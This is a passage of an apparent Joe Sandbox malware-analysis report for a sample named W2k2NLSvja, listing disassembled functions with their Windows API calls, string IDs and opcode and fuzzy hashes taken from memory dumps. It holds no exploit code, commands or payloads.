                                                                                                                        • _free.LIBCMT ref: 00FE999E
                                                                                                                          • Part of subcall function 00FA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA9C64), ref: 00FA2FA9
                                                                                                                          • Part of subcall function 00FA2F95: GetLastError.KERNEL32(00000000,?,00FA9C64), ref: 00FA2FBB
                                                                                                                        • _free.LIBCMT ref: 00FE99A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1552873950-0
                                                                                                                        • Opcode ID: 7179a2ff507044a4d5ea9946a9eb7f03cddcb89bd38e099aeab182df50c6b667
                                                                                                                        • Instruction ID: cfc9355f998b50afa5b66890ceeb0d63f67d9d0c06cdf8109e0a0cdb583e6c0f
                                                                                                                        • Opcode Fuzzy Hash: 7179a2ff507044a4d5ea9946a9eb7f03cddcb89bd38e099aeab182df50c6b667
                                                                                                                        • Instruction Fuzzy Hash: B05150F1E04258AFDF249F65CC81A9EBBB9EF48310F1004AEB609A7241DB755E80DF58
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2782032738-0
                                                                                                                        • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                                                        • Instruction ID: 039fce6a853a72ebfe3a709d1a989355f67659163cbfdbde658f1b018bbd52fa
                                                                                                                        • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                                                        • Instruction Fuzzy Hash: 8E41D8F5A007059BDF18CE69C88056F77A6EFC6370B24813DE855C7640D7B8BD51AB44
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FBEE62
                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00FBEEAC
                                                                                                                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                                                                                                                          • Part of subcall function 00FA09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA09F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 3777226403-3081909835
                                                                                                                        • Opcode ID: 491ce59dbc506e1245679d3e39d527482b4882d5f3abd541a5c2e16c02a17b98
                                                                                                                        • Instruction ID: 0e7fbfe7e44e64aa662c5db8fb523297e40198d16a58f43e11676f23454b2444
                                                                                                                        • Opcode Fuzzy Hash: 491ce59dbc506e1245679d3e39d527482b4882d5f3abd541a5c2e16c02a17b98
                                                                                                                        • Instruction Fuzzy Hash: C521D571A002589BCF15EF94CC45BEE7BFC9F49314F10801AF408A7281DBB899899FA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                        • Opcode ID: d0fe6c2a4c317e70588231f722b26f006bf9b7cb5770c37ac3b442a94e52afc4
                                                                                                                        • Instruction ID: 868a0e71d95cc8200432b62ed263fa0cb60e9d1bd7f5194edc5d5db3d9426a97
                                                                                                                        • Opcode Fuzzy Hash: d0fe6c2a4c317e70588231f722b26f006bf9b7cb5770c37ac3b442a94e52afc4
                                                                                                                        • Instruction Fuzzy Hash: 9101F9B2904258AEDB28C7A9CC16FEE7BFC9B01301F00419EF592D2181E5B9A604D760
                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00FE9B82
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FE9B99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                        • String ID: aut
                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                        • Opcode ID: 0b57f299aaf52c66788e1e04b1c7185e9e0e070fc22f61ebac58d0b54e64b825
                                                                                                                        • Instruction ID: adb946420b26208e773cc44a6973e9ebe517043dd1246a704ecfd170cf9729bf
                                                                                                                        • Opcode Fuzzy Hash: 0b57f299aaf52c66788e1e04b1c7185e9e0e070fc22f61ebac58d0b54e64b825
                                                                                                                        • Instruction Fuzzy Hash: 69D05E7954030EABDB309B90EC0EF9A772CE744700F0042A1BED4D6091DEB565989B91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d8bbd8f1afc71d07cf98ae98269a870e925fc979fb6fdafc37c9633ce080d20c
                                                                                                                        • Instruction ID: 9fdf64bfe3bd1dec68fc072df9ebe39d78a942348c2a2daa2882cd67a682b423
                                                                                                                        • Opcode Fuzzy Hash: d8bbd8f1afc71d07cf98ae98269a870e925fc979fb6fdafc37c9633ce080d20c
                                                                                                                        • Instruction Fuzzy Hash: 8DF18B719083059FC714DF28C880A6ABBE5FF88314F04892EF9999B351DB75E906DF82
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA03D3
                                                                                                                          • Part of subcall function 00FA03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA03DB
                                                                                                                          • Part of subcall function 00FA03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA03E6
                                                                                                                          • Part of subcall function 00FA03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA03F1
                                                                                                                          • Part of subcall function 00FA03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA03F9
                                                                                                                          • Part of subcall function 00FA03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA0401
                                                                                                                          • Part of subcall function 00F96259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F8FA90), ref: 00F962B4
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F8FB2D
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00F8FBAA
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FC49F2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1986988660-0
                                                                                                                        • Opcode ID: d5804b85c7f271316788d59c8228ed6f6241e6cf57a6a9e7f7561f4a39d0614c
                                                                                                                        • Instruction ID: 126139649d5f44e2554ab4cd055161f4b02e588798434b24bb185fb97b2a164d
                                                                                                                        • Opcode Fuzzy Hash: d5804b85c7f271316788d59c8228ed6f6241e6cf57a6a9e7f7561f4a39d0614c
                                                                                                                        • Instruction Fuzzy Hash: F481BBF89013808FCBA8EF39E6D46557AE6BB8A714710812A9199C724AFB3F4408DF50
                                                                                                                        APIs
                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00FA5963
                                                                                                                          • Part of subcall function 00FAA3AB: __NMSG_WRITE.LIBCMT ref: 00FAA3D2
                                                                                                                          • Part of subcall function 00FAA3AB: __NMSG_WRITE.LIBCMT ref: 00FAA3DC
                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 00FA596A
                                                                                                                          • Part of subcall function 00FAA408: GetModuleFileNameW.KERNEL32(00000000,010443BA,00000104,?,00000001,00000000), ref: 00FAA49A
                                                                                                                          • Part of subcall function 00FAA408: ___crtMessageBoxW.LIBCMT ref: 00FAA548
                                                                                                                          • Part of subcall function 00FA32DF: ___crtCorExitProcess.LIBCMT ref: 00FA32E5
                                                                                                                          • Part of subcall function 00FA32DF: ExitProcess.KERNEL32 ref: 00FA32EE
                                                                                                                          • Part of subcall function 00FA8D68: __getptd_noexit.LIBCMT ref: 00FA8D68
                                                                                                                        • RtlAllocateHeap.NTDLL(01680000,00000000,00000001,00000000,?,?,?,00FA1013,?), ref: 00FA598F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1372826849-0
                                                                                                                        • Opcode ID: 54ca34253c04ac01bc26d8a9da11e4bbe15251a3cebb2199dd4fe73281746ecf
                                                                                                                        • Instruction ID: 8c3debd4edcc273dee953f7ba155118fceb960341139c2c110810096e1277e86
                                                                                                                        • Opcode Fuzzy Hash: 54ca34253c04ac01bc26d8a9da11e4bbe15251a3cebb2199dd4fe73281746ecf
                                                                                                                        • Instruction Fuzzy Hash: 7201D2F6A00B16DFE6212B24ED42B6F72988F47B70F50002AF500AE181DBB99D01B360
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00FE97D2,?,?,?,?,?,00000004), ref: 00FE9B45
                                                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00FE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00FE9B5B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00FE97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE9B62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3397143404-0
                                                                                                                        • Opcode ID: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                                                                                                                        • Instruction ID: cd5486b75f9af831fa6f622eb3c815798464455f22e36a8d98080b8b56f01ba7
                                                                                                                        • Opcode Fuzzy Hash: 040529922342997cdf5405c8970e8622950f08dadfd717b2c8024fb2c6880d55
                                                                                                                        • Instruction Fuzzy Hash: C0E08632580315B7D7321B54EC09FCA7B18AB06B71F108110FB64690D087B62611A798
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00FE8FA5
                                                                                                                          • Part of subcall function 00FA2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00FA9C64), ref: 00FA2FA9
                                                                                                                          • Part of subcall function 00FA2F95: GetLastError.KERNEL32(00000000,?,00FA9C64), ref: 00FA2FBB
                                                                                                                        • _free.LIBCMT ref: 00FE8FB6
                                                                                                                        • _free.LIBCMT ref: 00FE8FC8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                                                                                        • Instruction ID: 068a26a8944e70cdd604506ccfd76a3ca2037a1ff9a4154264b96f37f718fbcf
                                                                                                                        • Opcode Fuzzy Hash: efa5cfa9b1b2f41bce9affd07bef402890ef9bb67adc050918c04926c1923072
                                                                                                                        • Instruction Fuzzy Hash: 91E012E1B097814ECA64B57DAD40A9367EE5F493A0718081DB40DDB146DE28E842A128
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CALL
                                                                                                                        • API String ID: 0-4196123274
                                                                                                                        • Opcode ID: d739d43e579001dc47a46db18ef4ec57ee3d266ff9dd9b4b290d9a17f3abe5d3
                                                                                                                        • Instruction ID: e8568b1b18b029f99ba6e1c412edb647e1087273f67bfa5f7ab38e7bbb01d2d1
                                                                                                                        • Opcode Fuzzy Hash: d739d43e579001dc47a46db18ef4ec57ee3d266ff9dd9b4b290d9a17f3abe5d3
                                                                                                                        • Instruction Fuzzy Hash: 89226971908201CFDB24EF14C895BAAB7E1FF85310F15895DE8968B362DB35EC45EB82
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                        • Opcode ID: 9437ff98f864af744985881a77499db899486b561a260480881344c2fa85a3dc
                                                                                                                        • Instruction ID: ef3f0d02ffdf2c041777bb740e730e8958bfdbb796c11af1fe40f100255e50ce
                                                                                                                        • Opcode Fuzzy Hash: 9437ff98f864af744985881a77499db899486b561a260480881344c2fa85a3dc
                                                                                                                        • Instruction Fuzzy Hash: D4417C72E0425A5BCF21BB64CC517FE7FA6AB05310F284075FC82DB282D625AD40B7A1
                                                                                                                        APIs
                                                                                                                        • IsThemeActive.UXTHEME ref: 00F84992
                                                                                                                          • Part of subcall function 00FA35AC: __lock.LIBCMT ref: 00FA35B2
                                                                                                                          • Part of subcall function 00FA35AC: DecodePointer.KERNEL32(00000001,?,00F849A7,00FD81BC), ref: 00FA35BE
                                                                                                                          • Part of subcall function 00FA35AC: EncodePointer.KERNEL32(?,?,00F849A7,00FD81BC), ref: 00FA35C9
                                                                                                                          • Part of subcall function 00F84A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F84A73
                                                                                                                          • Part of subcall function 00F84A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F84A88
                                                                                                                          • Part of subcall function 00F83B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B7A
                                                                                                                          • Part of subcall function 00F83B4C: IsDebuggerPresent.KERNEL32 ref: 00F83B8C
                                                                                                                          • Part of subcall function 00F83B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,010462F8,010462E0,?,?), ref: 00F83BFD
                                                                                                                          • Part of subcall function 00F83B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C81
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F849D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1438897964-0
                                                                                                                        • Opcode ID: 39d0914b5f7aee9d011179c72b3edfb74caa825f843cc1961060757372dc7074
                                                                                                                        • Instruction ID: 304a82a824f9b758bfa2636d017bf9fe2cdeeaaaab71bfd3bfbfefe96ddb279c
                                                                                                                        • Opcode Fuzzy Hash: 39d0914b5f7aee9d011179c72b3edfb74caa825f843cc1961060757372dc7074
                                                                                                                        • Instruction Fuzzy Hash: 1611C0B1904301AFC320EF68DA8595AFBE8EF95750F00451EF085832A1DBBA9544DB92
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00F85981,?,?,?,?), ref: 00F85E27
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00F85981,?,?,?,?), ref: 00FBE19C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: a52e3b67394139b6058de1204d6acc009b3091554966a07fbdf44702453e5aca
                                                                                                                        • Instruction ID: 2a25dca83c0329835a6cc98550a517ed05968906941391c0fec11ea27b76354b
                                                                                                                        • Opcode Fuzzy Hash: a52e3b67394139b6058de1204d6acc009b3091554966a07fbdf44702453e5aca
                                                                                                                        • Instruction Fuzzy Hash: 59019271644708BFF7355E28CC8AFE63A9CAB01B7CF108318BAE55A1D0C6B41E49AF50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA594C: __FF_MSGBANNER.LIBCMT ref: 00FA5963
                                                                                                                          • Part of subcall function 00FA594C: __NMSG_WRITE.LIBCMT ref: 00FA596A
                                                                                                                          • Part of subcall function 00FA594C: RtlAllocateHeap.NTDLL(01680000,00000000,00000001,00000000,?,?,?,00FA1013,?), ref: 00FA598F
                                                                                                                        • std::exception::exception.LIBCMT ref: 00FA102C
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00FA1041
                                                                                                                          • Part of subcall function 00FA87DB: RaiseException.KERNEL32(?,?,?,0103BAF8,00000000,?,?,?,?,00FA1046,?,0103BAF8,?,00000001), ref: 00FA8830
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                        • String ID:
